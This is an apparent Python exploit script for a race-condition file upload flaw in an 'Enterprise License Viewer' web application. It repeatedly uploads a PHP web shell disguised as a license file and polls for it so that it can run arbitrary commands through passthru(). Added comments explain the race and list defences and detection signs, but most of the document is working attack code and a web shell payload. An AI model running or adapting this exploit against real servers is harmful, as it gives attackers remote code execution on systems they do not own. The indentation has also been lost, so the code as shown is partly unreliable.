#!/usr/bin/python
from threading import Thread
from time import sleep
import requests
import urllib
from bs4 import BeautifulSoup
import sys
# Shared flag: the reader loop sets it once output has been received, and
# writer() polls it to know when to stop sending uploads.
result_received = False

# Exactly two positional arguments are required: the base URL and the command.
if len(sys.argv) != 3:
    script = sys.argv[0]
    print("Usage: %s <url> <cmd>" % script)
    print("Example: %s http://10.1.1.10/tools/lic/ dir" % script)
    sys.exit(1)

# Both values are used as given; the URL is later concatenated with
# '/index.php' and '/cmd.php' without any normalisation.
target, cmd = sys.argv[1], sys.argv[2]
def writer():
    """Repeatedly POST the same multipart upload to ``target + '/index.php'``.

    The form field ``licenseFile`` carries a file named ``cmd.php`` whose body
    is a license-shaped XML document followed by a PHP block. The loop runs
    until the module-level ``result_received`` flag becomes true or more than
    2000 attempts have been made.

    NOTE(review): indentation was lost in this copy of the file; the nesting
    below is reconstructed from statement order -- confirm against the
    original before relying on it.

    Defensive reading: the approach only works if the application places the
    uploaded file, under its client-supplied name, somewhere the web server
    will execute it, even briefly -- presumably it is written first and
    validated or removed afterwards (inferred from the retry loop and the
    banner's "race" wording; the server side is not shown here). The usual
    fixes are to validate before anything is written, to store uploads outside
    the document root under server-generated names, and to disable script
    execution in any upload or temporary directory.
    """
    # Multipart part: (client-supplied filename, file content). The content
    # starts like a license document so that it resembles the expected upload;
    # the trailing PHP block runs the ``cmd`` query parameter through
    # passthru() and wraps the result in <output> tags, which the reader loop
    # looks for.
    files = {'licenseFile':('cmd.php',"""fakeapp
<?xml version="1.0" encoding="UTF-8"?>
<license>
<registered_for>Name</registered_for>
<customer_mail>user@example.com</customer_mail>
<serial>123-1234-123</serial>
</license>
<?php
$cmd='whoami';
if (isset($_GET['cmd'])) {
$cmd=urldecode($_GET['cmd']);
}
echo '<output>';
echo passthru($cmd);
echo '</output>';
?>
""")}
    tryNr=0
    sleep(0.5) # Wait for the reader to be started
    # result_received is only read here; it is assigned at module level by the
    # reader loop in the __main__ block.
    while not result_received:
        #print "Try # "+str(tryNr)+": Sending payload"
        # One dot per attempt as a progress indicator.
        sys.stdout.write('.')
        sys.stdout.flush()
        # No timeout is passed, so a stalled server blocks this thread.
        # Detection note: on the server this appears as a rapid run of
        # multipart POSTs to index.php carrying a .php filename, interleaved
        # with GETs for cmd.php from the same client.
        r=requests.post(target+'/index.php', data={'submit':'submit'},files=files)
        tryNr=tryNr+1
        if tryNr>2000:
            print "It looks like something is not working here... I will stop now"
            # sys.exit() raises SystemExit in this thread only; it does not
            # stop the reader loop running in the main thread.
            sys.exit(1);
if __name__ == "__main__":
    # Entry point: print the banner, start the uploader thread, then poll for
    # the uploaded file from the main thread.
    # NOTE(review): indentation was lost in this copy of the file; the nesting
    # below (in particular the position of the final break) is reconstructed
    # -- confirm against the original.
    print "=================================================="
    print "= Enterprise License Viewer RCE Exploit ="
    print "= A RACE TO THE TARGET ="
    print "= ="
    print "= Written by Florian Bogner, 03-2018 ="
    print "= florian@bogner.sh // https://bogner.sh ="
    print "=================================================="
    print ""
    print "Starting Writer thread (Sends the command to the server)"
    # writer() uploads in a loop on a second thread while this thread reads.
    writer_thread = Thread(target = writer)
    writer_thread.start()
    print "Starting Reader ..."
    # Reader: request target + '/cmd.php' over and over, with the command
    # URL-encoded into the ``cmd`` query parameter. No timeout is passed and
    # the loop has no upper bound of its own.
    while True:
        r = requests.get(target+'/cmd.php?cmd='+urllib.quote_plus(cmd))
        # Any status other than 404 is taken to mean the file was present at
        # the moment of the request.
        if r.status_code != 404:
            soup = BeautifulSoup(r.text,"lxml")
            output = soup.findAll('output')
            # Exactly one <output> element means the PHP block in the upload
            # was executed rather than served as text or an error page. For a
            # defender, a response of this shape from an upload location shows
            # that uploaded content is being interpreted by the server.
            if len(output)==1:
                # Module-level assignment; writer() polls this flag and stops.
                result_received=True
                print ""
                print ""
                print "WWWWWIIIIIINNNNN"
                print ""
                print "Received output:"
                print "=================================================="
                print output[0].text.strip()
                print ""
                break;